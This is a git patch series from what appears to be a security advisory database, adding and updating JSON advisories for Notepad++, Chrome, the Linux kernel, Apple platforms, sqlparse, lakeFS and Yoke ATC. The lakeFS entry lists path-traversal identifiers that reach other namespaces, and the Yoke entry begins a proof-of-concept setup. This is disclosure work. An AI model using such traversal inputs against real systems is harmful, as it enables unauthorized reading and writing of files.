"nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json index a604220a3fc44..c7a7a06ab87da 100644 --- a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json +++ b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cqx4-h5ph-3xj9", - "modified": "2026-02-12T21:31:25Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-03T03:30:26Z", "aliases": [ "CVE-2025-15556" ], "details": "Notepad++ versions prior to 8.8.9, when using the WinGUp updater, contain an update integrity verification vulnerability where downloaded update metadata and installers are not cryptographically verified. An attacker able to intercept or redirect update traffic can cause the updater to download and execute an attacker-controlled installer, resulting in arbitrary code execution with the privileges of the user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json index 2031bb8024ac1..d0aa53669911d 100644 --- a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json +++ b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hpj8-5pv7-f58m", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2026-2321" ], "details": "Use after free in Ozone in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -27,7 +32,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:52Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json b/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json new file mode 100644 index 0000000000000..811f6456fe8f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jh9m-9mr6-3ghc", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-23111" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate()\n\nnft_map_catchall_activate() has an inverted element activity check\ncompared to its non-catchall counterpart nft_mapelem_activate() and\ncompared to what is logically required.\n\nnft_map_catchall_activate() is called from the abort path to re-activate\ncatchall map elements that were deactivated during a failed transaction.\nIt should skip elements that are already active (they don't need\nre-activation) and process elements that are inactive (they need to be\nrestored). Instead, the current code does the opposite: it skips inactive\nelements and processes active ones.\n\nCompare the non-catchall activate callback, which is correct:\n\n nft_mapelem_activate():\n if (nft_set_elem_active(ext, iter->genmask))\n return 0; /* skip active, process inactive */\n\nWith the buggy catchall version:\n\n nft_map_catchall_activate():\n if (!nft_set_elem_active(ext, genmask))\n continue; /* skip inactive, process active */\n\nThe consequence is that when a DELSET operation is aborted,\nnft_setelem_data_activate() is never called for the catchall element.\nFor NFT_GOTO verdict elements, this means nft_data_hold() is never\ncalled to restore the chain->use reference count. Each abort cycle\npermanently decrements chain->use. Once chain->use reaches zero,\nDELCHAIN succeeds and frees the chain while catchall verdict elements\nstill reference it, resulting in a use-after-free.\n\nThis is exploitable for local privilege escalation from an unprivileged\nuser via user namespaces + nftables on distributions that enable\nCONFIG_USER_NS and CONFIG_NF_TABLES.\n\nFix by removing the negation so the check matches nft_mapelem_activate():\nskip active elements, process inactive ones.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23111" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1444ff890b4653add12f734ffeffc173d42862dd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/42c574c1504aa089a0a142e4c13859327570473d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8b68a45f9722f2babe9e7bad00aa74638addf081" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c760ba4e36c750379d13569f23f5a6e185333f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b9b6573421de51829f7ec1cce76d85f5f6fbbd7f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f41c5d151078c5348271ffaf8e7410d96f2d82f8" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json b/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json new file mode 100644 index 0000000000000..20a23f7f6b607 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjrf-jfrm-p64x", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-23112" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec\n\nnvmet_tcp_build_pdu_iovec() could walk past cmd->req.sg when a PDU\nlength or offset exceeds sg_cnt and then use bogus sg->length/offset\nvalues, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining\nentries, and sg->length/offset before building the bvec.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23112" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/043b4307a99f902697349128fde93b2ddde4686c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1385be357e8acd09b36e026567f3a9d5c61139de" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/19672ae68d52ff75347ebe2420dde1b07adca09f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/42afe8ed8ad2de9c19457156244ef3e1eca94b5d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/52a0a98549344ca20ad81a4176d68d28e3c05a5c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ab200d71553bdcf4de554a5985b05b2dd606bc57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dca1a6ba0da9f472ef040525fab10fd9956db59f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json index f1b4fbd1723f2..1c90d7d688765 100644 --- a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json +++ b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json @@ -54,7 +54,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-125" + "CWE-125", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json new file mode 100644 index 0000000000000..3e77fd03b44d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3vc-646j-prpq", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2025-14349" + ], + "details": "Privilege Defined With Unsafe Actions, Missing Authentication for Critical Function vulnerability in Universal Software Inc. FlexCity/Kiosk allows Accessing Functionality Not Properly Constrained by ACLs, Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14349" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-267" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json index 01e122e5c3ef9..1d4011263dfdb 100644 --- a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json +++ b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r5cf-37x9-4hgv", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20658" ], "details": "A package validation issue was addressed by blocking the vulnerable package. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json index c3e366958502c..bd082985f53f7 100644 --- a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json +++ b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rp46-r563-jrc7", - "modified": "2026-02-13T12:31:21Z", + "modified": "2026-02-13T15:30:25Z", "published": "2026-02-13T12:31:21Z", "aliases": [ "CVE-2025-33042" @@ -17,6 +17,10 @@ { "type": "WEB", "url": "https://lists.apache.org/thread/fy88wmgf1lj9479vrpt12cv8x73lroj1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/12/2" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json index 825e2b9640018..a0236b79690b7 100644 --- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wp4v-6rrv-wqv9", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20655" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json index f64c8a37255a3..ceb4a2d258e16 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wxwg-9693-mqg4", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20656" ], "details": "A logic issue was addressed with improved validation. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, Safari 26.3, macOS Tahoe 26.3. An app may be able to access a user's Safari history.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -29,7 +34,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json new file mode 100644 index 0000000000000..877ed83397513 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgwv-vx48-69hc", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-1619" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Universal Software Inc. FlexCity/Kiosk allows Exploitation of Trusted Identifiers.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1619" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file From d14188d18e8e098c25df31407d6032dc397d499c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 16:17:56 +0000 Subject: [PATCH 06/36] Publish Advisories GHSA-27jp-wm6q-gp25 GHSA-699m-4v95-rmpm --- .../GHSA-27jp-wm6q-gp25.json | 66 ++++++++++++++++++ .../GHSA-699m-4v95-rmpm.json | 68 +++++++++++++++++++ 2 files changed, 134 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json diff --git a/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json new file mode 100644 index 0000000000000..e6959febeead2 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27jp-wm6q-gp25", + "modified": "2026-02-13T16:16:11Z", + "published": "2026-02-13T16:16:11Z", + "aliases": [], + "summary": "sqlparse: formatting list of tuples leads to denial of service", + "details": "### Summary\nThe below gist hangs while attempting to format a long list of tuples.\n\nThis was found while [drafting a regression test for Dja\nngo 5.2's composite primary key feature](https://code.djangoproject.com/ticket/36416#comment:3), which allows querying composite fields with tuples.\n\n###", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "sqlparse" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.5.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-27jp-wm6q-gp25" + }, + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/commit/40ed3aa958657fa4a82055927fa9de70ab903360" + }, + { + "type": "PACKAGE", + "url": "https://github.com/andialbrecht/sqlparse" + }, + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/releases/tag/0.5.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T16:16:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json new file mode 100644 index 0000000000000..32fa774fc8cb7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-699m-4v95-rmpm", + "modified": "2026-02-13T16:16:04Z", + "published": "2026-02-13T16:16:04Z", + "aliases": [ + "CVE-2026-26187" + ], + "summary": "lakeFS vulnerable to path traversal in local block adapter allow cross-namespace and sibling directory access", + "details": "## Summary\n\nTwo path traversal vulnerabilities in the local block adapter allow authenticated users to read and write files outside their designated storage boundaries.\n\n## Details\n\nThe local block adapter in `pkg/block/local/adapter.go` had two path traversal vulnerabilities:\n\n### 1. Prefix Bypass Vulnerability\n\nThe `verifyRelPath` function used `strings.HasPrefix()` to verify that requested paths fall within the configured storage directory. This check was insufficient because it validated only the path prefix without requiring a path separator, allowing access to sibling directories with similar names.\n\n**Example:** If the adapter is configured with base path `/data/lakefs`:\n\n| Path | Expected | Actual |\n|------|----------|--------|\n| `/data/lakefs/valid/file.txt` | Allowed | Allowed |\n| `/data/lakefs_evil/secret.txt` | Blocked | **Vulnerable** |\n| `/data/lakefs_backup/data.db` | Blocked | **Vulnerable** |\n\n### 2. Namespace Escape via Identifier\n\nThe adapter verified that resolved paths stayed within the adapter's base path, but did not verify that object identifiers stayed within their designated storage namespace. This allowed attackers to use path traversal sequences in the object identifier to access files in other namespaces.\n\n**Example:** With base path `/data/lakefs` and namespace `local://repo1/userdata`:\n\n| Identifier | Resolved Path | Expected | Actual |\n|------------|---------------|----------|--------|\n| `file.txt` | `/data/lakefs/repo1/userdata/file.txt` | Allowed | Allowed |\n| `../secrets/key.txt` | `/data/lakefs/repo1/secrets/key.txt` | Blocked | **Vulnerable** |\n| `../../other-repo/data.txt` | `/data/lakefs/other-repo/data.txt` | Blocked | **Vulnerable** |\n\nThis vulnerability allows users with access to one namespace to read and write files in other namespaces within the same lakeFS deployment.\n\n## Impact\n\nAuthenticated lakeFS users can:\n\n- **Read and write files in sibling directories** that share the same path prefix as the storage directory (vulnerability 1)\n- **Access files across namespaces** by using path traversal in object identifiers (vulnerability 2)\n\nThis could allow attackers to:\n\n- Read sensitive data from other repositories/namespaces\n- Write malicious files to other namespaces\n- Read/write files in adjacent directories outside lakeFS storage\n- Potentially escalate privileges if writable directories are used by other services\n\nThis vulnerability **only affects** deployments using the local block adapter. Deployments using S3, GCS, Azure, or other object storage backends are **not affected**.\n\n## Patches\n\nFixed in version v1.77.0.\n\nThe fixes:\n1. Append a path separator to prefix checks, ensuring paths must be within the storage directory\n2. Add two-level path validation: verify both that namespace paths stay within the adapter's base path AND that resolved paths stay within their designated namespace\n\n## Workarounds\n\n- Configure the storage path with a unique name unlikely to be a prefix of other directories\n- Restrict filesystem permissions for the lakeFS process\n- Ensure no sensitive data exists in sibling directories\n\n## Credit\n\nDiscovered via CodeQL static analysis.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/treeverse/lakefs" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.77.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.76.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/treeverse/lakeFS/security/advisories/GHSA-699m-4v95-rmpm" + }, + { + "type": "WEB", + "url": "https://github.com/treeverse/lakeFS/commit/cbc106275357302a834280f133265dc39f1384ce" + }, + { + "type": "PACKAGE", + "url": "https://github.com/treeverse/lakeFS" + }, + { + "type": "WEB", + "url": "https://github.com/treeverse/lakeFS/releases/tag/v1.77.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T16:16:04Z", + "nvd_published_at": null + } +} \ No newline at end of file From 8de3c83068cc825555fc753979042e7bcd884076 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 17:17:07 +0000 Subject: [PATCH 07/36] Publish Advisories GHSA-33mh-2634-fwr2 GHSA-87fh-rc96-6fr6 GHSA-965m-v4cc-6334 GHSA-jr94-gj3h-c8rf GHSA-p6pv-q7rc-g4h9 GHSA-wj8p-jj64-h7ff --- .../GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json | 2 +- .../GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json | 6 +++++- .../GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json | 15 ++++++++++++--- .../GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json | 8 ++++++-- .../GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json | 6 +++++- .../GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json | 8 ++++++-- 6 files changed, 35 insertions(+), 10 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json index a06c125cd8919..c2459ea5cf20f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json +++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33mh-2634-fwr2", - "modified": "2026-02-12T14:22:46Z", + "modified": "2026-02-13T17:16:36Z", "published": "2026-02-09T20:37:05Z", "aliases": [ "CVE-2026-25765" diff --git a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json index b654c6ebe59a7..277f68bdc730a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json +++ b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-87fh-rc96-6fr6", - "modified": "2026-02-07T00:32:04Z", + "modified": "2026-02-13T17:16:07Z", "published": "2026-02-05T21:19:30Z", "aliases": [ "CVE-2026-25758" @@ -140,6 +140,10 @@ "type": "WEB", "url": "https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054" }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_api/CVE-2026-25758.yml" + }, { "type": "PACKAGE", "url": "https://github.com/spree/spree" diff --git a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json index d2ecb5f8b36fb..3abcd13dcb9ec 100644 --- a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json +++ b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-965m-v4cc-6334", - "modified": "2026-02-12T22:06:36Z", + "modified": "2026-02-13T17:15:36Z", "published": "2026-02-12T22:06:36Z", "aliases": [ "CVE-2026-26055" ], "summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC", "details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(&review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- `/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: 